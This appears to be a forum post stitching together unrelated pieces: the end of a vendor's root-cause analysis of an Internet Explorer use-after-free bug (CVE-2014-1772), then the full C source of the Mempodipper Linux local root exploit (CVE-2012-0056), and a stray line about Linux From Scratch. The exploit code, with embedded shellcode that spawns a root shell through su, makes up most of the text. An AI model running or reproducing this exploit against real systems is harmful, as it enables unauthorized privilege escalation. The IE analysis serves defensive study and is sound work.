!heap -p -a edi command in windbg. Figure 4. Call stack The above figure shows us the call stack of the CTreePos object freed. The call stack has a lot of information. We see the function CMarkup::FreeTreePos; this evidence gives us evidence that the freed object is CTreePos object and that this is a use-after-free issue. Since it is a UAF issue, we want to deeply understand the issue. We need to locate where the CTreePos object is created, where the object is freed, and where the freed object is used again. Figure 4 gives us where the object was freed. To find where is used again, we need to examine the crash point. The call stack is as follows: Figure 5. Call stack How do we find the location where the CTreePos object was created? There are many ways. I prefer to run the sample again, and break the object freed point and use the !heap -p -a xxxx command to trace back to where the object is created. The call stack is as follows: Figure 6. Call stack For UAF problems, I prefer to compare the 3 locations (create, free, use again) to find some clues. Figure 7. Call stacks There are 3 columns in Figure 7. They are call stack trace summaries: from left to right, it is when the object is created, freed, and used again. In the above example, the direction of the stack is from the bottom to the top. There is plenty of useful information here. First, we can find the relationship between the 3 parts. Under the yellow line, CDoc::CutCopyMove is the last identical function in the creation call stack trace and the free call stack trace. This means the execution flow creates the CTreePos object and then frees the object in CDoc::CutCopyMove. Under the red line, the execution flow frees the object and then uses it again (and crashes) in CSpliceTreeEngine::InsertSplice. In the second column, we find the execution flow in the CSpliceTreeEngine::InsertSplice function encounters a failure and call the Fire_onerror function. The function will call the JavaScript object’s onerror event. At the event, the execution will call CMarkupPointer::UnEmbed to free the object. Right away, we have four questions. Why does it trigger an onerror event? Why does it create the CTreePos object? Why does it free the CTreePos object? Why does it use the freed object again? Before answering these questions, I want to summarize some background knowledge about how Internet Explorer’s DOM tree implementation. Because IE is not open source, this information is gathered by reverse engineering, so it may not be 100% accurate. One page has a CMarkup object to represent the page’s skeleton or DOM tree. The CMarkup object contain a pointer to the root CElement object. This is the parent class of many concrete element classes. In Figure 1, the Javascript object e_1 and e_2 are the CObjectElement objects which are inherited from CElement. The CElement object has a pointer to a CTreeNode object. The CTreeNode object also has a pointer to a related CElement object. The CTreeNode’s object has a pair of pointer to CTreePos objects. Why is a CTreePos object needed? This is because IE uses a Splay Tree algorithm to manuiplate the DOM tree. In the Splay Tree, the CTreePos object is the node that is involved in the algorithm. The CMarkupPointer object represents a location in the CMarkup object (DOM tree). So the CMarkupPointer object has a pointer to CTreePos to represent its location. CMarkupPointer has several statuses which are related to UAF issues. Embed status: this means CMarkupPointer created CTreePos, which is added to the Splay Tree. Unembed status: this means CMarkupPointer removes the CTreePos from the Splay Tree and frees it. The following graph describes the interactions involving the splay tree. Figure 8. Splay tree graph Going back to our four questions, we can now attempt to answer them. Why does it trigger an onerror event? From Figure 1?s Javascript code, we can see e_2.onerror sets a handler function. At line 22, e_2.swapNode will trigger DOM tree’s changing; this calls the CObjectElement::CreateObject function. This function checks the object’s CLSID. Because e_2’s CLSID is not set, it triggers the onerror event handler. In the handler, at line 22, the Javascipt code r.insertNode(e_2) will change the DOM tree once again and change CObjectElement::CreateObject as well; because e_2 has no CLSID , it will again trigger the onerror event handler once again. The second time the this handler runs, at r.setEnd(document.all[1],0)” , it frees the CTreePos object. Why does it create the CTreePos object? From Figure 6, the CTreePos object is created in calling the CDomRange::InsertNode function. We can map this function to Figure 1?s line 19: r.insertNode(e_2). The CDomRange::InserNode function will insert elements into the DOM tree. The function is called Doc::CutCopyMove to modify the DOM tree and takes several arguments. The first CMarkupPointer type argument is the source start location in CMarkup (DOM tree) . The second CMarkupPointer type argument is the source end location in CMarkup (DOM Tree). The third CMarkupPointer type argument is the target location in CMarkup (DOM Tree). Doc::CutCopyMove will copy or move the source sub DOM tree to the target location in DOM tree. Because of the use of the Splay Tree algorithm (which uses CTreePos as a node), the function needs to create a CTreePos object and add it to the SplayTree for source CMarkup (DOM tree) and target CMarkup (DOM Tree). Doc::CutCopyMove calls CMarkup::DoEmbedPointers to let the CMarkupPointer change to embed status. Finally, the CTreePos object is created. The UAF CTreePos object is created for the e_1 JavaScript element. Why does it free the CTreePos object? From the call stack trace when the CTreePos object is freed (Figure 4), we can find CDomRange::setEnd. This function can be mapped to line 17 in Figure 1: r.setEnd(e_1,0). That means the CTreePos object is in the implementation of setEnd. The CDomRange::setEnd function wants to replace the original end point with a new end point. This function finally calls CMarkupPointer::MoveToPointer to move to the specific DOM tree location. It will first call CMarkupPointer::UnEmbed to change this CMarkupPointer object to unembed and remove CTreePos from the Splay Tree and free it. The JavaScript code r.setEnd‘s argument is the e_1 element. So the CTreePos object related with the e_1 element is freed. Why does it use the freed object again? In Figure 7, under the red line is the function call for CSpliceTreeEngine::InsertSplice. Column B is CSpliceTreeEngine::InsertSplice+0x13ff. Column C is CSpliceTreeEngine::InsertSplice+0x6EDD4A. Column B is the free call stack trace and Column C is the “used again” crash call stack trace. This means that both “free” and “used again” happen in one function called CSpliceTreeEngine::InsertSplice. We trace the execution flow in this function, and find the following: Figure 9. Assembly code Instruction 636898C4, eax is the address of the UAF CTreePos Objects. The function saves the address to a local variable var_1E4. Then, it proceeds to 6368AA9A. Figure 10. Assembly code At 6368AA9A, it calls a virtual function CObjectElement::Notify. We can find here the call stack trace from Figure 7?s column B. This means when running this call, it encounters an error and calls the onerror event handler . That frees the CTreePos object. However, the CSpliceTreeEngine::InsertSplice function local variable var_1E4 holds a reference to this freed object. It then proceeds to 63D7735B. At 63D7735B , it calls CElment::RecordTextChange ForTsf with var_1E4 as the second argument. When this function is run, if any instruction accesses the contents of the CTreePos object, a crash occurs. Summary In brief, the UAF issue’s root cause is that under the event interaction context, CSpliceTreeEngine::InsertSplice doesn’t handle local variable reference validation properly. DOM is based on event mechanisms. Under complex event interaction contexts, it is a significant challenge to solve UAF issue completely. However, in recent patches Microsoft has introduced memory protection in Internet Explorer, which helps mitigate UAF issues (especially in cases where a UAF object is referenced from the call stack). This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better. Trend Micro Deep Security protects users against this particular threat. The following rule, released as part of the regular updates released in June is applicable: 1006036 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-1772) Sursa: Root Cause Analysis of CVE-2014-1772 - An Internet Explorer Use After Free Vulnerability | Security Intelligence Blog | Trend Micro

[h=1]Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2[/h] /*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.cBlog post about it is here: http://blog.zx2c4.com/749 */ /* * Mempodipper * by zx2c4 * * Linux Local Root Exploit * * Rather than put my write up here, per usual, this time I've put it * in a rather lengthy blog post: http://blog.zx2c4.com/749 * * Enjoy. * * - zx2c4 * Jan 21, 2012 * * CVE-2012-0056 */ #define _LARGEFILE64_SOURCE #define _GNU_SOURCE #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/user.h> #include <sys/ptrace.h> #include <sys/reg.h> #include <fcntl.h> #include <unistd.h> #include <limits.h> char *prog_name; int send_fd(int sock, int fd) { char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; int n; char cms[CMSG_SPACE(sizeof(int))]; buf[0] = 0; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = CMSG_LEN(sizeof(int)); cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_len = CMSG_LEN(sizeof(int)); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; memmove(CMSG_DATA(cmsg), &fd, sizeof(int)); if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len) return -1; close(sock); return 0; } int recv_fd(int sock) { int n; int fd; char buf[1]; struct iovec iov; struct msghdr msg; struct cmsghdr *cmsg; char cms[CMSG_SPACE(sizeof(int))]; iov.iov_base = buf; iov.iov_len = 1; memset(&msg, 0, sizeof msg); msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_control = (caddr_t)cms; msg.msg_controllen = sizeof cms; if ((n = recvmsg(sock, &msg, 0)) < 0) return -1; if (n == 0) return -1; cmsg = CMSG_FIRSTHDR(&msg); memmove(&fd, CMSG_DATA(cmsg), sizeof(int)); close(sock); return fd; } unsigned long ptrace_address() { int fd[2]; printf("[+] Creating ptrace pipe.\n"); pipe(fd); fcntl(fd[0], F_SETFL, O_NONBLOCK); printf("[+] Forking ptrace child.\n"); int child = fork(); if (child) { close(fd[1]); char buf; printf("[+] Waiting for ptraced child to give output on syscalls.\n"); for ( { wait(NULL); if (read(fd[0], &buf, 1) > 0) break; ptrace(PTRACE_SYSCALL, child, NULL, NULL); } printf("[+] Error message written. Single stepping to find address.\n"); struct user_regs_struct regs; for ( { ptrace(PTRACE_SINGLESTEP, child, NULL, NULL); wait(NULL); ptrace(PTRACE_GETREGS, child, NULL, &regs); #if defined(__i386__) #define instruction_pointer regs.eip #define upper_bound 0xb0000000 #elif defined(__x86_64__) #define instruction_pointer regs.rip #define upper_bound 0x700000000000 #else #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) return instruction_pointer; } } } else { printf("[+] Ptrace_traceme'ing process.\n"); if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) { perror("[-] ptrace"); return 0; } close(fd[0]); dup2(fd[1], 2); execl("/bin/su", "su", "not-a-valid-user", NULL); } return 0; } unsigned long objdump_address() { FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r"); if (!command) { perror("[-] popen"); return 0; } char result[32]; fgets(result, 32, command); pclose(command); return strtoul(result, NULL, 16); } unsigned long find_address() { printf("[+] Ptracing su to find next instruction without reading binary.\n"); unsigned long address = ptrace_address(); if (!address) { printf("[-] Ptrace failed.\n"); printf("[+] Reading su binary with objdump to find exit@plt.\n"); address = objdump_address(); if (address == ULONG_MAX || !address) { printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n"); printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name); exit(-1); } } printf("[+] Resolved call address to 0x%lx.\n", address); return address; } int su_padding() { printf("[+] Calculating su padding.\n"); FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); if (!command) { perror("[-] popen"); exit(1); } char result[256]; fgets(result, 256, command); pclose(command); return strstr(result, "this-user-does-not-exist") - result; } int child(int sock) { char parent_mem[256]; sprintf(parent_mem, "/proc/%d/mem", getppid()); printf("[+] Opening parent mem %s in child.\n", parent_mem); int fd = open(parent_mem, O_RDWR); if (fd < 0) { perror("[-] open"); return 1; } printf("[+] Sending fd %d to parent.\n", fd); send_fd(sock, fd); return 0; } int parent(unsigned long address) { int sockets[2]; printf("[+] Opening socketpair.\n"); if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) { perror("[-] socketpair"); return 1; } if (fork()) { printf("[+] Waiting for transferred fd in parent.\n"); int fd = recv_fd(sockets[1]); printf("[+] Received fd at %d.\n", fd); if (fd < 0) { perror("[-] recv_fd"); return 1; } printf("[+] Assigning fd %d to stderr.\n", fd); dup2(2, 15); dup2(fd, 2); unsigned long offset = address - su_padding(); printf("[+] Seeking to offset 0x%lx.\n", offset); lseek64(fd, offset, SEEK_SET); #if defined(__i386__) // See shellcode-32.s in this package for the source. char shellcode[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3" "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89" "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd" "\x80"; #elif defined(__x86_64__) // See shellcode-64.s in this package for the source. char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48" "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f" "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7" "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50" "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; #else #error "That platform is not supported." #endif printf("[+] Executing su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { char sock[32]; sprintf(sock, "%d", sockets[0]); printf("[+] Executing child from child fork.\n"); execl("/proc/self/exe", prog_name, "-c", sock, NULL); } return 0; } int main(int argc, char **argv) { prog_name = argv[0]; if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') return child(atoi(argv[2])); printf("===============================\n"); printf("= Mempodipper =\n"); printf("= by zx2c4 =\n"); printf("= Jan 21, 2012 =\n"); printf("===============================\n\n"); if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o') return parent(strtoul(argv[2], NULL, 16)); else return parent(find_address()); } Sursa: http://www.exploit-db.com/exploits/35161/

Incepe cu asta: Welcome to Linux From Scratch!